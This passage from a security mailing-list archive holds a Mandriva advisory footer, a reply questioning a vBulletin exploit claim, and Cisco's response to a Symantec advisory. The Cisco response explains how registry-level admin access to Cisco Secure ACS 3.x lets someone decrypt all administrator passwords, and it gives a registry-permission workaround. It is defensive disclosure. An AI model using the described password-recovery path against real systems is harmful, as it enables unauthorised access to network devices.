 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEYiyXmqjQ0CJFipgRApTHAKDtzmh1uicPEuGbvPLc5Gr6wM+hJgCg22Zd
VHvcUKcFBGTsmikARwjTa2c=
=i4ob
-----END PGP SIGNATURE-----
Re: vbulletin security Alert
Testing this on a vBulletin 3.5.x-dev build, all that I was able to produce was HTML output; no arbitrary PHP code was executed. You can test this by simply inserting into a template: nothing appears. If there are more steps please do provide them.
RE: SYMSA-2006-003: Cisco Secure ACS for Windows - Administrator Password Disclosure
Hi Greg,

No, the ACS Solution Engine (aka appliance) is not vulnerable.

Thanks,
John

-----Original Message-----
From: Greg owens [mailto:[EMAIL PROTECTED]]
Sent: Monday, May 08, 2006 6:45 PM
To: Matthew Cerha (mcerha); bugtraq@securityfocus.com
Cc: [EMAIL PROTECTED]; psirt (mailer list)
Subject: Re: SYMSA-2006-003: Cisco Secure ACS for Windows - Administrator Password Disclosure

Does this include the ACS appliance engine?

Greg Owens, CCNP CCSP CISSP
Email: [EMAIL PROTECTED]
--
Sent from my Samsung I730 Wireless Handheld

-----Original Message-----
>From: "Matthew Cerha" <[EMAIL PROTECTED]>
>Sent: 5/8/06 6:15:58 PM
>To: "bugtraq@securityfocus.com"
>Cc: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>, "psirt (mailer list)" <[EMAIL PROTECTED]>
>Subject: Re: SYMSA-2006-003: Cisco Secure ACS for Windows - Administrator Password Disclosure
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Cisco Response
>==============
>
>This is Cisco PSIRT's response to the statements made by Symantec in
>its advisory: SYMSA-2006-003, posted on May 8, 2006.
>
>The original email/advisory is available at:
>
>http://www.symantec.com/enterprise/research/SYMSA-2006-003.txt
>
>This issue is being tracked by Cisco Bug ID:
>
>  * CSCsb67457 ( registered customers only) -- Cisco Secure ACS
>    Administrator Password Remote Retrieval and Decryption.
>
>We would like to thank Andreas Junestam and Symantec for reporting
>this vulnerability to us.
>
>We greatly appreciate the opportunity to work with researchers on
>security vulnerabilities, and welcome the opportunity to review and
>assist in product reports.
>
>Additional Information
>======================
>
>Cisco Secure Access Control Server (ACS) provides centralized
>identity management and policy enforcement for Cisco devices.
>
>CSCsb67457 ( registered customers only) -- Cisco Secure ACS
>Administrator Password Remote Retrieval and Decryption.
>
>Symptom:
>
>A person with administrative access to the Windows registry of a
>system running Cisco Secure ACS 3.x for Windows can decrypt the
>passwords of all ACS administrators.
>
>Condition:
>
>Cisco Secure ACS 3.x for Windows stores the passwords of ACS
>administrators in the Windows registry in an encrypted format. A
>locally generated master key is used to encrypt/decrypt the ACS
>administrator passwords. The master key is also stored in the Windows
>registry in an encrypted format. Using Microsoft cryptographic
>routines, it is possible for a user with administrative privileges to
>a system running Cisco Secure ACS to obtain the clear-text version of
>the master key. With the master key, the user can decrypt and obtain
>the clear-text passwords for all ACS administrators. With
>administrative credentials to Cisco Secure ACS, it is possible to
>change the password for any locally defined users. This may be used
>to gain access to network devices configured to use Cisco Secure ACS
>for authentication.
>
>If remote registry access is enabled on a system running Cisco Secure
>ACS, it is possible for a user with administrative privileges
>(typically domain administrators) to exploit this vulnerability.
>
>If Cisco Secure ACS is configured to use an external authentication
>service such as Windows Active Directory / Domains or LDAP, the
>passwords for users stored by those services are not at risk to
>compromise via this vulnerability.
>
>This vulnerability only affects version 3.x of Cisco Secure ACS for
>Windows. Cisco Secure ACS for Windows 4.0.1 and Cisco Secure ACS for
>UNIX are not vulnerable. Cisco Secure ACS 3.x appliances do not
>permit local or remote Windows registry access and are not
>vulnerable.
>
>Workaround:
>
>It is possible to mitigate this vulnerability by restricting access
>to the registry key containing the ACS administrators' passwords. One
>feature of Windows operating systems is the ability to modify the
>permissions of a registry key to remove access even for local or
>domain administrators. Using this feature, the registry key
>containing the ACS administrators' passwords can be restricted to
>only the Windows users with a need to maintain the ACS installation
>or operate the ACS services.
>
>The following registry key and all of its sub-keys need to be
>protected.
>
>HKEY_LOCAL_MACHINE\SOFTWARE\Cisco\CiscoAAAv3.3\CSAdmin\Administrators
>
>Note: The "CiscoAAAv3.3" portion of the registry key path may differ
>slightly depending on the version of Cisco Secure ACS for Windows
>that is installed.
>
>There are two general deployment scenarios for Cisco Secure ACS. The
>Windows users that need permissions to the registry key will depend
>on the deployment type.
>
>  * If Cisco Secure ACS is n